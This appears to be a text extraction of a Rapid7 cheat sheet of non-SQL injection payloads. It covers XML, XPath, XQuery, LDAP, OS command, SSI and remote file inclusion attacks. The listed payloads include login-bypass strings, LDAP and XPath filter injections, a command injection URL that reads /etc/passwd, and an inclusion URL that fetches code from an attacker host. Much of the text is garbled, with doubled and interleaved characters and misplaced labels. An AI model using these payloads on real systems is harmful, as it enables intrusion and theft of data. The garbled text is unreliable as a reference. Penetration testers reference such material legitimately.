XML Injection
INJECTION CHEAT SHEET (non-SQL) www.rapid7.com
Detection ‘
single quote
“
double quote
XPATH Injection
<>
angular parentheses
Detection
XML Comment tag
‘ “
single quote
&
ampersand
double quote
CDATA section delimiters
Exploitation
Exploitation
‘ or 1=1 or ‘’=‘
New value of existing tag along with tag name
‘] | * | user[@role=’admin
Add user as administrato administratorr
“ NODENAME ”
returns all children of node
“ //NODENAME ”
returns all elements in the document
http://www.example.com/addUser.php?us ername=dan&password=12 ername=dan&pas sword=123456
0[email protected]
“ NO NOD EN EN AM AM E/ E//S UB UBN OD OD EN EN AM AM E ”
ret ur urn s a llll SU SUBN OD OD E un de der NO NOD E elemen t
OS Command Injection
“ //N //NOD ODEN ENAM AME/ E/[N [NAM AME= E=‘V ‘VAL ALUE UE’] ’] ”
ret etur urns ns al alll NOD NODE E tha thatt hav have e a NA NAME ME ch chil ild d equal to VALUE
Detection
http://site.com/login. aspx?username=foo’ aspx?usernam e=foo’ or 1=1 or ‘’=‘
Login bypass
LDAP Injection
|
Pipe - On *NIX Output of first command to another, In Windows multiple commands execution
;
semicolon - Running two commands together
Exploitation
Detection
%%
Windows only
(
opening bracket
&
Running command in background (*NIX Only)
)
closing bracket Pipe - OR operator for LDAP
://site.com/whois.php?domain=foobar; echo+/etc/passwd
Displays content of /etc/passwd file
I &
Ampersand - AND operator for LDAP
XQuery Injection
!
Exclamation - NOT operator for LDAP
Detection
Exploitation
‘
single quote
(&(param1=val1)(param2=val2))
AND op operator
“
double quote
(|(param1=val1)(param2=val2))
OR operator
Exploitation
*)(ObjectClass=*)) (&(objectClass=void
Blind LDAP Injection using AND operator
‘ or or .=’
void)(Ob void )(Object jectClas Class=vo s=void))( id))(&(obj &(objectC ectClass lass=voi =void d
BLIND BLIN D LDAP Injection Injection using OR oper operator ator
http ht tp:/ ://s /sit ite. e.co com/ m/ld ldap apse sear arch ch?u ?use ser= r=**
Disp Di spla lays ys li list st of al alll us user erss wi with th at attr trib ibut utes es
something” or “”=”
Remote Code Injection
Displays list of of all users with attributes attributes
SSI Injection
Detection
Upload File
include, echo, exec
Upload file
.SHTML
PHP, JSP, ASP etc.
Injecting active content
execution!
Access back from webroot
Remote file inclusion/injection include($incfile);
http://site.com/xm http://site .com/xmlsearch?u lsearch?user=foo” ser=foo” or “”=”
Look for word File extension
Exploitation < ! # = / . “ - > an an d [a -z -zA -Z -Z0 -9 -9 ]
Req ui ui re red ch ch ar ara ct ct er ers fo for su su cc cces sf sf ul ul ex exec ut ut io ion
PHP call
http://site.com/page.php?file=http://www.attacker.com/exploit
Injecting
http://site.com/ssiform.php?showfile=
Displays content of /etc/passwd file
